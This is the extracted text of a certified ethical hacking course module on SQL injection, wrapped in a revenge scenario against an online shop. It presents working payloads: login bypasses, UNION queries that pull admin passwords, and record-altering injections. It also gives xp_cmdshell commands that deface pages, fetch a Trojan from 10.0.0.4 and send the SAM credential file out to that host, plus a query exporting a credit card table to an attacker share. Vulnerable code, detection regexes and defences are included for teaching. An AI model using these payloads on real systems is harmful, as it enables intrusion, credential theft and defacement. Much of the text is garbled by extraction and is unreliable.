CEHv6.1 Module 19 SQL Injection

Ethical Hacking and
Countermeasures
Version 6.1
Mod le XIX
Module
SQL Injection
Scenario
Susan was an SQL programmer with a reputed firm. She

ordered an expensive anniversary gift for her husband
from ee-shopping4u
shopping4u.com,
com which was a lesser-known
lesser known online
shopping portal but was offering better deals, and was
promised delivery on anniversary day. She wanted to give
her husband a surprise gift. She was upset on the
anniversary
i
day
d as the
h gift
if she
h ordered
d d was not d
delivered.
li
d
She tried to contact the portal but in vain. After several
failed attempts to contact the portal, she thought of taking
revenge out of frustration.
frustration
What do you think, as an SQL programmer, Susan can do?
EC-Council
Copyright by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News
EC-Council
Source: http://www.scmagazineus.com/ Copyright by EC-Council

Module Objective
This module will familiarize you with:
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in Oracle
SQL Injection in MySql
Attacking
k
SQL servers
Automated Tools for SQL Injection
Countermeasures
EC-Council
Module Flow
SQL Injection
SQL Injection in MySql
Steps for performing SQL Injection
Attacking SQL servers
Automated Tools for SQL Injection
Countermeasures
EC-Council
SQL Injection: Introduction
EC-Council
What is SQL Injection

SQL injection is a type of security exploit in which the attacker "injects"
Structured Query Language (SQL) code through a web form input box
box, to gain
access to resources, or make changes to data
It is a technique
q of injecting
j
g SQL
Q commands to exploit
p
non-validated input
p
vulnerabilities in a web application database backend
Programmers
g
use sequential
q
commands with user input,
p , making
g it easier for
attackers to inject commands
Att k
Attackers
can execute
t arbitrary
bit
SQL commands
d through
th
h the
th web
b application
li ti
EC-Council
Exploiting Web Applications

SQL injection exploits web applications using clientsupplied
li d sqll queries
i
It enables an attacker to execute unauthorized SQL
commands
d
It also takes advantage
g of unsafe q
queries in web
applications and builds dynamic SQL queries
For example, when a user logs onto a web page by using a
user name and password for validation,
validation a SQL query is
used
However, the attacker can use SQL injection to send
specially
i ll crafted
ft d user name and
d password
d fi
fields
ld th
thatt
poison the original SQL query
EC-Council
SQL Injection Steps

What do you need?
Any web browser
Input validation attack occurs here on a website

EC-Council
What Should You Look For

Try to look for pages that allow a user to submit data, for example: a log in
page, search
h page, feedback,
f db k etc.
Look for HTML pages that use POST or GET commands
If POST is used, you cannot see the parameters in the URL
Check the source code of the HTML to get information
For example, to check whether it is using POST or GET, look for the <Form>
tag in the source code:
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
EC-Council
What If It Doesnt Take Input

Iff input
i
is
i not given,
i
check
h k for
f pages like
lik ASP,
AS JSP,
S CGI,
CG or PHP
Check the URL that takes the following parameters:
Example:
http:// www.xsecurity.com /index.asp?id=10
In the above example, attackers might attempt:

http://www.xsecurity.com/index.asp?id=blah or 1=1-EC-Council
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try
using
i (') as the
h user name
The following error message will be displayed when a (') is entered into a form
that is vulnerable
ulnerable to an SQL injection attack
If you get this error, then the website is vulnerable to an SQL injection attack
EC-Council
Input Validation Attack
Input validation attack occurs here on a website

EC-Council

Authorization
bypass
Bypassing log on
forms
Using the SELECT

command
Used to retrieve data

from the database
Using the INSERT

command
Used to add
information to the
database
SQL Injection
techniques:
Using SQL server

stored procedures
EC-Council
How to Test for SQL Injection

Vulnerability
Use a single quote in the input:
blah or 1=1
Login:blah
Login:blah or 1=1
1 1
Password:blah or 1=1
http://search/index.asp?id=blah or 1=1--
Depending
di on the
h query, try the
h ffollowing
ll i
possibilities:
or 1=1- or 1=1- or a=a
or a=a
) or (
(a=a)
)
)
EC-Council
How Does it Work

Attacker breaks into the system by injecting malformed SQL into the query
Original SQL Query:
strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "'
AND Password='" + txtPassword.Text + "'";
In the case of the user entering a valid user name of "Paul"

and a password of "password", strQry becomes:
SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'
But when the attacker enters ' Or 1=1 --, the query now
becomes:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of a

comment in SQL, the query becomes simply:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1
EC-Council
BadLogin.aspx.cs
This code is vulnerable to an SQL Injection Attack

private void cmdLogin_Click(object sender, System.EventArgs e) {
Attack Occurs Here
string
t i
strCnx
t C
=
"server=localhost;database=northwind;uid=sa;pwd=;";
SqlConnection cnx = new SqlConnection(strCnx);
cnx.Open();
//This code is susceptible to SQL injection attacks.
string strQry = "SELECT Count(*) FROM Users WHERE UserName='" +
txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
int intRecs;
SqlCommand cmd = new SqlCommand(strQry, cnx);
intRecs = (int) cmd.ExecuteScalar();
if (intRecs>0) {
FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
}
else {
lblMsg.Text = "Login attempt failed.";
}
cnx Close();
cnx.Close();
}
EC-Council
BadProductList.aspx.cs
This code is vulnerable to an SQL Injection Attack

private void cmdFilter_Click(object sender, System.EventArgs e) {
g
g
= 0;
dgrProducts.CurrentPageIndex
bindDataGrid();
}
private void bindDataGrid() {
dgrProducts.DataSource = createDataView();
dgrProducts.DataBind();
}
Attack Occurs Here
private DataView createDataView() {

string strCnx =
"server=localhost;uid=sa;pwd=;database=northwind;";
string strSQL = "SELECT ProductId, ProductName, " +
"QuantityPerUnit, UnitPrice FROM Products";
//This code is susceptible to SQL injection attacks.
if (txtFilter.Text.Length > 0) {
strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
}
SqlConnection cnx = new SqlConnection(strCnx);
SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
DataTable dtProducts = new DataTable();
sda.Fill(dtProducts);
return dtProducts.DefaultView;
}
EC-Council
Executing Operating System

Commands
Use stored procedures like master..xp_cmdshell to perform
remote execution
Execute any OS commands
blah;exec master..xp
p_cmdshell insert OS command
here --
Ping a server
blah;exec
bl h
master..xp_cmdshell
t
d h ll ping
i
10
10.10.1.2
10 1 2 --
Directory listing
blah
blah;exec
;exec master..xp_cmdshell
master xp cmdshell dir
dir c:\*
c:\ .* /s >
c:\directory.txt --
Create a file
blah;exec master..xp_cmdshell echo juggyboy-was-here
> c:\juggyboy.txt EC-Council
Executing Operating System

Commands (cont
(contd)
d)
Defacing a web page (assuming that write access is
allowed due to misconfiguration)
blah;exec master..xp_cmdshell echo you-are-defaced >
c:\inetpub\www.root\index.htm -
Execute applications (only non-gui

non gui app)
blah;exec master..xp_cmdshell cmd.exe /c appname.exe --
Upload a Trojan to the server

blah;exec master..xp_cmdshell tftp i 10.0.0.4 GET trojan.exe
c:\trojan.exe --
Download a file from the server

blah ;exec master..xp_cmdshell
blah;exec
master xp cmdshell tftp
tftp i
i 10.0.0.4
10 0 0 4 put
c:\winnt\repair\SAM SAM --
EC-Council
Getting Output of SQL Query

Use sp_makewebtask
sp makewebtask to write a query into an HTML
Example
blah;EXEC master..sp_makewebtask
\\
\\10.10.1.4\share\creditcard.html,
\ h \ dit d ht l
SELECT * FROM CREDITCARD
The above command exports a table called credit card, to the
attackers network share
EC-Council
Getting Data from the Database

Using ODBC Error Message
Using UNION keyword
http://xsecurity.com/index.asp?id=10 UNION
SELECT TOP 1 TABLE_NAME FROM
INFORMATION SCHEMA.TABLES-INFORMATION_SCHEMA.TABLES
To retrieve information from the above query, use:
SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--
Using LIKE keyword

http:// xsecurity.com /index.asp?id=10 UNION SELECT
TOP 1 TABLE FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME LIKE %25LOGIN%25--
EC-Council
How to Mine all Column Names

of a Table
To map out all the column names of a table, type:
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1

COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=admin_login-
To get to the next column name, use NOT IN( )
http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP

1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=admin_login
g
WHERE COLUMN_NAME NOT
IN(login_id)-EC-Council
How to Retrieve any Data

To get the login_name from the
admin_login
login table:
admin
http:// xsecurity.com /index.asp?id=10 UNION
SELECT TOP 1 login_name FROM admin_login--
From above, you get login_name of

the admin_user:
To get the password for

login name=yuri
login_name=
yuri - http// xsecurity.com /index.asp?id=10 UNION
SELECT TOP 1 password FROM admin_login where
l i
login_name=yuri-
i
EC-Council
How to Update/Insert Data into

Database
After gathering
Af
h i all
ll off column
l
names off a table,
bl iit iis possible
ibl to UPDATE
or INSERT records into it:
Example to change the password for yuri:
http:// xsecurity.com /index.asp?id=10; UPDATE admin_login
SET password = newboy5 WHERE login_name=yuri--
To INSERT a record:
http:// xsecurity.com /index.asp?id=10; INSERT

INTOadmin_login(login_id,login_name,password,details)
VALUES(111,yuri2,newboy5,NA)--
EC-Council
SQL Injection in Oracle can be

performed as follows:
UNIONS can be added to the existing statement to execute a
second statement
SUBSELECTS can be added to the existing statements
Data Definition Language (DDL) can be injected if DDL is used in
a dynamic SQL string
INSERTS, UPDATES, and DELETES can also be injected
Anonymous
A
PL/SQL
/SQ block
bl k iin procedures
d
EC-Council
SQL Injection in MySql Database

It is not easy to perform SQL injection in a MySql database
While coding with a MySql application, the injection vulnerability is not

exploited
l i d
Itt iss d
difficult
cu t to ttrace
ace tthee output
You can see an error because the value retrieved is passed on to multiple
queries with different numbers of columns before the script ends
In such situations, SELECT and UNION commands cannot be used
EC-Council

(cont d)
(contd)
For example:
F
l consider
id a d
database
t b
pizza:
http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'
To show the tables, type the query:
mysql> SHOW TABLES;
To see the current user:
mysql> SELECT USER();
The following query shows the first byte of Admin's Hash:
mysql> SELECT SUBSTRING(user_password,1,1)FROM
mb_users WHERE user_g
group
p = 1;
The following query shows the first byte of Admin's Hash as an ASCII number:
mysql> SELECT ASCII('5');
EC-Council

(cont d)
(contd)
Preparing the GET Request
Req est
To inject SQL commands successfully, the request from any single quotes should be
cleaned
mysql> Select active_id FROM mb_active UNION SELECT
IF(SUBSTRING(user_password,1, 1) = CHAR(53), BENCHMARK(1000000,
MD5(CHAR(1))), null) FROM mb_users WHERE user_group = 1;
Exploiting the Vulnerability

First,
i
log
l iin as a registered
i
d user with
i h the
h rights
i h to reply
l to the
h current thread
h d
http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1 UNION
SELECT IF (SUBSTRING(user_password,1,1) = CHAR(53),
BENCHMARK(1000000, MD5(CHAR(1))), null), null, null, null, null
FROM mb_users
mb users WHERE user_group
user group = 1/*
1/
You will see a slow down, because the first byte is CHAR(53), 5
EC-Council
Attack Against SQL Servers

Techniques
q
Involved:
Understand SQL Server and extract the necessary
information from the SQL Server Resolution Service
List of servers by Osql-L probes
Sc.exe sweeping of services
Port scanning
Use of commercial alternatives
EC-Council
SQL Server Resolution Service

(SSRS)
SSRS service is responsible for sending a response packet containing the
connection details of clients who send a specially formed request
The packet contains the details necessary to connect to the desired instance,
including the TCP port
The SSRS has buffer overflow vulnerabilities that allow remote attackers to
overwrite portions of the systems memory and execute arbitrary codes
EC-Council
Osql L- Probing
Osql L- Probing is a command-line utility provided by Microsoft with SQL

Server 2000, that allows the user to issue queries to the server
Osql.exe includes a discovery switch (-L) that will poll the network looking
for other installations of SQL Server
It returns a list of server names and instances, but without details about TCP
ports or netlibs
EC-Council
SQL Injection Tools
EC-Council
SQL Injection Automated Tools

SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
Q
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
EC-Council
Hacking Tool: SQLDict

SQLdict is a dictionary attack tool for SQL
Server
It tests if the accounts are strong enough to

resist an attack
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
EC-Council
Hacking Tool: SQLExec

This tool executes commands on compromised Microsoft SQL Servers by using xp_cmdshell
p
stored procedure
It uses a default sa account with a NULL password
USAGE: SQLExec www.target.com
Source: http://phoenix.liu.edu/
EC-Council
SQL Server Password Auditing

Tool: sqlbf
sqlbf tool is used to audit the strength of Microsoft SQL Server passwords offline
The tool can be used either in Brute-Force mode or in Dictionary attack mode
The performance on a 1GHZ pentium (256MB) machine is about 750,000 guesses/sec
To be able to perform an audit, the password hashes that are stored in the sysxlogins table
in the master database are needed
The hashes are easy to retrieve, although a privileged account is needed. The query to use
would be:
select name, password from master..sysxlogins
To perform a dictionary attack on the retrieved hashes:

sqlbf -u hashes.txt -d dictionary.dic -r out.rep
EC-Council
Hacking Tool: SQLSmack
SQLSmack is a Linux-based remote command execution for MSSQL

When provided with a valid user name and password, the tool permits the
execution of commands on a remote MS SQL Server, by piping them through
the stored procedure master..xp_cmdshell
EC-Council
Hacking Tool: SQL2.exe

SQL2 is an UDP Buffer Overflow Remote Exploit hacking tool
EC-Council
sqlmap
sqlmap is an automatic SQL injection tool developed in Python
It performs an extensive database management system back-end
fingerprint
Features:
Retrieves remote DBMS databases

Retrieves usernames, tables, and columns
Enumerates the entire DBMS
Reads system files
It supports two SQL injection techniques:

Blind SQL Injection
Inband SQL injection, also known as UNION query SQL Injection
EC-Council
sqlmap: Screenshot 1
Enumerate Database Management System Users

EC-Council
Test for SQL injection on POSTed data

EC-Council
Test for SQL Injection and DBMS back-end Detection

EC-Council
sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a
web
b application
l
It p
performs the following:
g
Fingerprints the remote SQL Server (version, user performing the
queries, user privileges, xp_cmdshell availability, and DB Server
authentication mode)
Bruteforces the 'sa' password
Privilege escalation to 'sa'
Creates a custom xp_cmdshell if the original one has been disabled
Uploads executables
Reverses scan in order to look for a port that can be used for a reverse
shell
Directs and reverses shell, both TCP and UDP
DNS tunneled pseudoshell,
pseudoshell when no ports are available for a bindshell
EC-Council
Sqlninja: Screenshot 1
EC-Council
EC-Council
EC-Council
EC-Council
EC-Council
EC-Council
SQLIer
SQLIer takes a vulnerable URL and attempts
to determine all necessaryy information to
exploit SQL Injection vulnerability by itself,
requiring no users interaction
It can build
b ld a UNION SELECT query
designed to brute force passwords out of
database
To operate, this script does not use quotes
in the exploit
An 8 character password takes

approximately 1 minute to crack
EC-Council
SQLIer: Screenshot
EC-Council
Automagic SQL Injector

Automagic SQL Injector is an automated SQL injection tool designed to
save time
ti
in
i penetration
t ti ttesting
ti
It is only designed to work with vanilla Microsoft SQL injection holes
where
h
errors are returned
d
F
Features:
EC-Council
Browses tables and dumps table data to a CSV file

U l d files
Uploads
fil using
i the
h d
debug
b script
i method
h d
Comprises of Automagical UDP reverse shell
Has interactive xp_cmdshell (simulated cmd.exe shell)
Automagic SQL Injector:

Screenshot 1
EC-Council
Automagic SQL Injector:

Screenshot 2
EC-Council
Absinthe
Absinthe is a GUI-based tool that automates the process of downloading
the
h schema
h
and
d contents off a d
database
b
that
h iis vulnerable
l
bl to Bli
Blind
d SQL
Injection
Features:
EC-Council
Has automated
H
t
t d SQL iinjection
j ti
Supports MS SQL Server, MSDE, Oracle, and Postgres
Has cookies / Additional HTTP Headers
Comprises
p
of q
queryy termination
Additional text appended to queries
Supports use of proxies / proxy rotation
Has multiple filters for page profiling
Has custom delimiters
Absinthe: Screenshot
EC-Council
Blind SQL Injection
EC-Council
Blind SQL Injection

Blind SQL injection is a hacking method that allows an
unauthorized attacker to access a database server
It is facilitated by a common coding blunder: program
accepts data from a client and executes SQL queries without
validating the clients input
Attacker is then free to extract, modify, add, or delete
content from the database
Attackers typically test for SQL injection vulnerabilities by
sending application input that would cause server to
generate an invalid SQL query
EC-Council
Blind SQL Injection:

Countermeasures
To secure an application against SQL injection, developers must never allow
the client-supplied
client supplied data to modify the syntax of the SQL statements
The best protection is to isolate the web application from SQL
All SQL statements required by the application should be in stored
procedures and kept on a database server
Application should execute stored procedures using a safe interface such as
JDBCs CallableStatement or ADOs Command Object
If arbitrary statements must be used, use PreparedStatements
Both PreparedStatements and stored procedures compile the SQL
SQLss
statement before the users input is added, making it impossible to modify the
actual SQL statement
EC-Council
Blind SQL Injection: Screenshot
EC-Council
Blind SQL Injection Schema
EC-Council
SQL Injection Countermeasures
EC-Council

Selection of Regular Expressions
Regular expressions for detection of SQL meta characters are:

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix
In the above example, the regular expression would be added to the

snort rule as follows:
alert tcp $EXTERNAL_NET
_
any -> $HTTP_SERVERS
_
$HTTP_PORTS
_
(msg:"SQL Injection - Paranoid";
flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|
(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack;
sid:9099;
rev:5;)
</TD<
tr>character, it will not be encoded by the
Since
# is not
an HTML
meta
browser
EC-Council

(cont d)
(contd)
The modified regular expressions for detection of SQL meta characters
are:
/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i
The regular expressions for a typical SQL injection attack are:
/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix
\w* -zero or more alphanumeric or underscore characters
(\%27)|\' -the ubiquitous single-quote or its hex equivalent
the word or
or with various combinations of
(\%6F)|o|(\%4F))((\%72)|r|(\%52) -the
its upper and lower case hex equivalents
EC-Council

(cont d)
(contd)
The regular
g
expressions
p
for detecting
g an SQL
Q injection
j
attack using
g
UNION as a keyword:
/((\%27)|(\'))union/ix
(\%27)|(\')) - the single quote and its hex equivalent
(\%27)|(\
union - the keyword union
The above expression can be used for SELECT, INSERT, UPDATE, DELETE,
and DROP keywords
The regular expressions for detecting SQL injection attacks on a MS

SQL server:
//exec(\s|\+)+(s|x)p\w+/ix
(\ |\ ) ( | ) \
/i
exec -the keyword required to run the stored or extended procedure
(\s|\+)+ -one or more white spaces, or their HTTP encoded equivalents
(s|x)p -the letters sp or xp to identify stored or extended procedures,
respectively
i l
\w+ -one or more alphanumeric or underscore characters to complete the name of
the procedure
All
Rights
Reserved.
Reproduction
is Strictly Prohibited
EC-Council
Preventing SQL Injection

Attacks
Minimize the privileges of database connections
Disable the verbose error messages
Protect the system account sa
Audit source codes:
EC-Council
Escape single quotes

Input validation
Reject
j
known bad input
p
Input bound checking
Preventing SQL Injection Attacks

(cont d)
(contd)
Never trust the users
user s input
Validate all textbox entries using validation controls, regular expressions, code etc.
Never use dynamic SQL

Use parameterized SQL or stored procedures
Never connect to a database using an admin-level account

Use a li
limited
i d access account to connect to the
h d
database
b
Do not store secrets in plain text

Encrypt
yp or hash p
passwords and other sensitive data;; yyou should also encrypt
yp the
connection strings
Exceptions should divulge minimal information

Do not reveal much information in error messages; use custom errors to display
minimal information in the event of an unhandled error; set debug to false
EC-Council
GoodLogin.aspx.cs
private void cmdLogin_Click(object sender, System.EventArgs e) {
string strCnx = ConfigurationSettings.AppSettings["cnxNWindBad"];
using (SqlConnection cnx = new SqlConnection(strCnx))
{
SqlParameter prm;
cnx.Open();
string strQry =
"SELECT Count(*) FROM Users WHERE UserName=@username " +
@p
;
"AND Password=@password";
int intRecs;
SqlCommand cmd = new SqlCommand(strQry, cnx);
cmd.CommandType= CommandType.Text;
prm = new SqlParameter("@username",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtUser.Text;
cmd.Parameters.Add(prm);
prm = new SqlParameter("@password",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtPassword.Text;
cmd.Parameters.Add(prm);
intRecs = (int) cmd.ExecuteScalar();
if (intRecs>0) {
FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
}
else {
lblMsg.Text = "Login attempt failed.";
}
}
}
EC-Council
SQL Injection Blocking Tool: SQLBlock

http://www.sqlblock.com
SQLBlock is an ODBC/JDBC driver with a

patent pending SQL injection prevention
feature
It works as an ordinary ODBC/JDBC data

so ce and it monito
source,
monitorss eevery
e SQL statement
being executed
If the client application tries to execute any
un-allowed SQL statements, it blocks the
execution and sends an alert to the
administrator
EC-Council
SQLBlock: Screenshot
EC-Council
Acunetix Web Vulnerability

Scanner
Acunetix Web scanner can
detect and report any SQL
Injection vulnerabilities
Other features include:
Cross site scripting / XSS

vulnerabilities
l
biliti
Google hacking vulnerabilities
Source: http://www.acunetix.com
EC-Council
What Happened Next

Susan searched the Internet for security vulnerabilities of a portal.
By chance, she got an online forum listing SQL vulnerabilities of eshopping4u.com. A SQL programmer herself, she crafted an SQL
statement and inserted that in place of user name in their
registration form. And to her surprise, she was able to bypass all
input validations.
She could now access databases of e-shopping4u.com and play
with thousands of their customers records consisting of credit card
and
d other
h personall iinformation.
f
i
L
Losses to e-shopping4u.com
h
i
could
ld
be devastating.
EC-Council
Summary
SQL injection is an attack methodology that targets the data residing in
a database
d b
It attempts to modify the parameters of a web-based application in
order to alter the SQL statements that are parsed, in order to retrieve
data from the database
Database footprinting is the process of mapping the tables on the
database and is a crucial tool in the hands of an attacker
database,
Exploits occur due to coding errors as well as inadequate validation
checks
Prevention involves enforcing better coding practices and database
administration procedures
EC-Council
EC-Council
EC-Council
EC-Council

CEHv6.1 Module 19 SQL Injection

Uploaded by

Copyright:

Available Formats

CEHv6.1 Module 19 SQL Injection

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEHv6.1 Module 19 SQL Injection

Uploaded by

Copyright:

Available Formats

Ethical Hacking and

Susan was an SQL programmer with a reputed firm. She

Source: http://www.scmagazineus.com/ Copyright by EC-Council

SQL Injection in MySql

Steps for performing SQL Injection

Attacking SQL servers

SQL Injection Techniques

Automated Tools for SQL Injection

SQL Injection in Oracle

SQL Injection: Introduction

What is SQL Injection

Exploiting Web Applications

SQL Injection Steps

Input validation attack occurs here on a website

What Should You Look For

What If It Doesnt Take Input

Check the URL that takes the following parameters:

In the above example, attackers might attempt:

Input Validation Attack

Input validation attack occurs here on a website

SQL Injection Techniques

Using the SELECT

Used to retrieve data

Using the INSERT

Using SQL server

How to Test for SQL Injection

How Does it Work

In the case of the user entering a valid user name of "Paul"

Because a pair of hyphens designates the beginning of a

This code is vulnerable to an SQL Injection Attack

Attack Occurs Here

This code is vulnerable to an SQL Injection Attack

Attack Occurs Here

private DataView createDataView() {

Executing Operating System

Executing Operating System

Execute applications (only non-gui

Upload a Trojan to the server

Download a file from the server

Getting Output of SQL Query

Getting Data from the Database

Using LIKE keyword

How to Mine all Column Names

http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1

To get to the next column name, use NOT IN( )

http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP

How to Retrieve any Data

From above, you get login_name of

To get the password for

How to Update/Insert Data into

http:// xsecurity.com /index.asp?id=10; INSERT

SQL Injection in Oracle

SQL Injection in Oracle can be

SQL Injection in MySql Database

While coding with a MySql application, the injection vulnerability is not

SQL Injection in MySql Database

SQL Injection in MySql Database

Exploiting the Vulnerability

Attack Against SQL Servers

SQL Server Resolution Service